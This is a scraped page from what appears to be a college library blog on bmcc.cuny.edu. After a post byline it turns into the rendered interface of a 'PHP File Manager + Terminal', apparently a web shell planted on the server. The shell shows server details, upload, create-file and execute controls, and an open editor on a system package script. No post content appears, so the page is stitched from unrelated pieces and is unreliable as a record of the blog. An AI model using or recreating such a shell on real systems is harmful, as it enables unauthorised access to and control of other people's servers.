Looking for something? Use OneSearch! Posted on January 23, 2020 (February 3, 2025) by Rebecca Hyams PHP File Manager + Terminal PHP File Manager + TerminalServer: www.bmcc.cuny.eduSoftware: Apache/2.4.62 (Debian)Current directory: //var/lib/dpkg/info Upload Create File Create Folder Execute Editing: /var/lib/dpkg/info/readline-common.postinst#! /bin/sh -e install_from_default() { if [ ! -f $2 ]; then cp -p $1 $2 fi } if [ "$1" = "configure" ] && [ "$2" = "" ]; then install_from_default /usr/share/readline/inputrc /etc/inputrc fi Save